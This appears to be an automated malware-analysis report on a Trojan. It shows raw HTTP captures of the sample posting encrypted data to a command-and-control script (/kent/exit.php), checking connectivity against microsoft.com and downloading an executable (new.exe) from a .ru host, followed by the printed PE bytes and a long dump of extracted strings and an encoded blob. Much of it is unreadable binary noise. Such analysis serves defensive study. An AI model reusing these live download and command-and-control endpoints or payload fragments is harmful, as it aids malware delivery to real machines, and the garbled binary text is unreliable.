D.G.PI..........Z..G..!...~#..G..,....enp..?..,.Z..2&h..h..{.......&K....z..QJ..n.O....._B......f.....E.l./.>N.8.N..#R'....?HjH......ll.M../n.X..........fF..........P.]:j..}..._..2.x...N0.h<.#o.3....9(..w..../.'.U..9..%...K.a....X...VD#......;.6;:..7...Y[.......3.c..F(.....Rc..`t.Gb%j.M....V..$S....o..f-...rA..k...^
<<< skipped >>>
POST /kent/exit.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 277
Connection: Keep-Alive
Cache-Control: no-cache
.,.5...n
.aQ..M...n..Y.mR.Nlx..U...7....P..A..........v.....^.i.e6....;...L...@...6x.TQ....Js.O...A~...:z}4...."..!.$ic".s)....D[...f.......T%......c.v...9{......v.t.eB....b.Y%...G.dmt...6.8.7.....J..c....f!..R.R' .^p.........".5Y....gg.....`....r...6...~. ......{.@.L...j..
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:44 GMT
Content-Type: text/html
Content-Length: 76
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Vary: Accept-Encoding
.).O/,.4@.-'`8..0....=.9.H.....=f.1..c..# .*..j.v6....P@.a. ..35.<.....('..VHTTP/1.1 200 OK..Server: nginx/1.2.1..Date: Sun, 20 Sep 2015 13:52:44 GMT..Content-Type: text/html..Content-Length: 76..Connection: keep-alive..X-Powered-By: PHP/5.4.27-1~dotdeb.1..Vary: Accept-Encoding...).O/,.4@.-'`8..0....=.9.H.....=f.1..c..# .*..j.v6....P@.a. ..35.<.....('..V....
POST /kent/exit.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 277
Connection: Keep-Alive
Cache-Control: no-cache
e..Gp.O..rr..#.D)..v7.\.^l.?..H.d..3fS'...>k.n..R.MD...E....~....R.0..q..p
..k.\$6.......7?z].b~C......./ .n.^;'3.._.A<<.uu...!Xl0A..0..!N.?..:In.p..!V..K.m.x$.)c.l.f..px..(\.....;;sg.R|.....*9...`........
...A..7..0..6.7[.-~Vr.ie`y...>d.P...An...O... .........](t.7.7..}%X
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:45 GMT
Content-Type: text/html
Content-Length: 76
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Vary: Accept-Encoding
.M.z.!.....{.#...Z.."3u..:....S..m.K....U....i.~G......(d...M)w5.Xe...;..h..HTTP/1.1 200 OK..Server: nginx/1.2.1..Date: Sun, 20 Sep 2015 13:52:45 GMT..Content-Type: text/html..Content-Length: 76..Connection: keep-alive..X-Powered-By: PHP/5.4.27-1~dotdeb.1..Vary: Accept-Encoding...M.z.!.....{.#...Z.."3u..:....S..m.K....U....i.~G......(d...M)w5.Xe...;..h....
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: microsoft.com
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.microsoft.com/
Server: Microsoft-IIS/8.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sun, 20 Sep 2015 13:52:49 GMT
Connection: close
Content-Length: 148
<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>..
GET /new.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: changeexchange4.ru
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 20 Sep 2015 13:52:44 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 20 Sep 2015 12:45:08 GMT
ETag: "1c795b9-23fa8-5202d22803d00"
Accept-Ranges: bytes
Content-Length: 147368
Connection: close
Content-Type: application/x-msdos-program
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L...c..U.....................0......P.............@.................................Q.......................................D...(........................?..................................................(... ....................................text...H........................... ..`.data...............................@....rsrc...............................@..@l.[J............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
regsvr32.exe_3264:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowser
IWebBrowserApp4
IWebBrowserApp4
IWebBrowser2l
IWebBrowser2l
.length;
.length;
=String.fromCharCode(parseInt(
=String.fromCharCode(parseInt(
.substr(
.substr(
,2),16));
,2),16));
=String.fromCharCode(
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt()^
,1).charCodeAt());
,1).charCodeAt());
.length-1)?
.length-1)?
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
psapi.dll
psapi.dll
HTTP/1.1
HTTP/1.1
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
0123456789
Mozilla
Mozilla
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
@.reloc
@.reloc
222.dll
222.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
version.dll
version.dll
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ole32.dll
ole32.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
atl.dll
atl.dll
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
4"4,414?4
4"4,414?4
3,313[3`3
3,313[3`3
829
829
=.=3=[=`=
=.=3=[=`=
>!>&>7>
>!>&>7>
7)707;7@7
7)707;7@7
= =$=,=_=
= =$=,=_=
?0'101>1
?0'101>1
: :&: :}:
: :&: :}:
?,?;?@?^?
?,?;?@?^?
8 8$8(8,808
8 8$8(8,808
c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1 pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1 qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85 Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1 pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh 